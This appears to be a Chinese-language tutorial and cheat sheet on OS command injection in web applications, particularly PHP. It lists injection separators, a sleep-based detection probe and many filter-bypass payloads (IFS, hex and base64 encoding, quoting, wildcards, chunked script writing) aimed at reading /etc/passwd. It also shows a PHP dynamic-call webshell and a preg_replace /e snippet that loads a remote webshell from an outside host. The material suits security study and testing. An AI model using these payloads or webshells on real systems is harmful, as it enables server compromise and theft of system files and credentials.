# 命令注入漏洞

&nbsp;

## 注入漏洞挖掘

### 【命令注入】

* 操作系统命令注入，它可以让攻击者可以在运行应用程序的服务器上执行任意的操作系统(Operating system)命令，并且通常会完全破坏应用程序及所有数据。攻击者通常可以利用OS命令注入漏洞来破坏托管基础结构的其它部分，利用信任机制将攻击转移到组织内的其它结构。

### 【注入原理】

* 命令注入不复杂也不难理解，核心就是利用特定的连接符，将攻击者注入的攻击命令拼接至已有的代码中触发执行
* PHP中可以执行代码的函数。
  ```
  如eval()、assert()、、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等
  ```
  system()：执行一个外部的应用程序并显示输出的结果
  exec()：执行一个外部的应用程序
  passthru()：执行一个UNIX系统命令并显示原始的输出
  shell_exec()：执行shell命令并返回输出的结果的字符串

### 【漏洞挖掘】

* 一般含有ping功能的网页中可能含有漏洞，或者有使用系统命令的地方
* 一般使用sleep探测是否含有命令注入漏洞
* 127.0.0.1;sleep 10 （执行完ping 127.0.0.1后，执行sleep 10，抓包发现ping完的包和下一发数据包有10秒的间隙，网站会暂停几秒后更新）

* **注入方法**
  * command1 ; command2（linux中分开命令之间的符号，不管前一个执行结果如何，两个命令都会执行）
  * command1 \n command2 （linux中的换行符，会执行两个命令，一般encode为%0a）
  * command1 & command2（先执行Command 1，不管是否成功，都会执行Command 2）
  * command1 && command2（与的逻辑，先执行Command 1，执行成功后执行Command 2，否则不执行Command 2）
  * command1 | command2（command1、command2都会执行 command1的标准输出作为command2的标准输入）
  * command1 | | command2（或的逻辑，如果command1 执行成功，则不执行command2;如果command1执行失败，则执行command2：）
  * command1${LS_COLORS:10:1}command2 （使用系统中的环境变量裁剪后得到命令分割符，${LS_COLORS:10:1}为；  ${PATH:0:1}为/   前提是$不会被过滤）

### 【bypass】

* **找替代命令bypass**
  cat:由第一行开始显示内容，并将所有内容输出
  tac:从最后一行倒序显示内容，并将所有内容输出
  more:根据窗口大小，一页一页的现实文件内容
  less:和more类似，但其优点可以往前翻页，而且进行可以搜索字符
  head:只显示头几行
  tail:只显示最后几行
  tailf:类似于tail –f
  paste:读取文件
  
* **空格过滤绕过**
  * 使用{IFS} 代替空格，cat{IFS}/etc/passwd
  * 有时可以使用tab来代替空格，%09就是tab键，cat%09/etc/passwd

* **关键字拼接绕过**
  ```bash
  a=ca;b=t;$a$b /etc/passwd
  ```
  
* **编解码bypass**
  * hex编解码绕过
  ```bash
  `echo -e '\x63\x61\x74' /etc/passwd`
  ```
  ```bash
  $(printf "\154\163")     ==> ls
  ```
  
  * base编解码绕过
  ```bash
  `echo Y2F0Cg==|base64 -d` /etc/passwd
  ```
  
  * 引号bypass
  ```bash
  kali@kali:~$ u'n'ame -a
  Linux kali 5.7.0-kali1-amd64
  ```
  
  * 通配符bypass
  ```bash
  cat /e?c/p*d
  ```
  
* **命令长度限制bypass**
  * 可以通过 >> 输出重定向，向一个.sh中多次追加写入绕过输入长度限制
  ```bash
  kali@kali:~$ echo 'cat /etc\' >> cmd.sh
  kali@kali:~$ echo '/passwd' >> cmd.sh
  kali@kali:~$ chmod +x cmd.sh
  kali@kali:~$ ./cmd.sh
  ```
  
* **动态代码执行**
  * http://127.0.0.1/x.php?a=system&b=ipconfig 执行系统命令ipconfig
  ```php
  <?php
  $a = $_GET['a'];
  $b= $_GET['b'];
  $a($b);
  ?>
  ```
  >分批传参往往比直接传参容易过掉waf

  * 除了正常代码执行函数外，也有不同情况可以执行代码，例如preg_replace()函数
  ```php
  <?php
  $a="m";
  $m=file_get_contents("http://192.168.0.110/1.txt");//加载远程大马
  preg_replace("/_/e",$$a,"_");
  ?>
  ```
  

&nbsp;

## 注入点的探测及回显问题

### 【重定向命令执行结果】


* gpadmin@cyberlabsz05-EC600G3-GE:~$ cat /etc/passwd > /tmp/passwd
gpadmin@cyberlabsz05-EC600G3-GE:~$ cat /tmp/passwd

>输出重定向到文件需要考虑路径和文件的写入权限问题，通常/tmp 是对于所有用户都有读写权限的。另外可以考虑将注入命令回显信息，写入到某个log文件中，通过前端的log日志下载/查看功能获取命令注入回显。



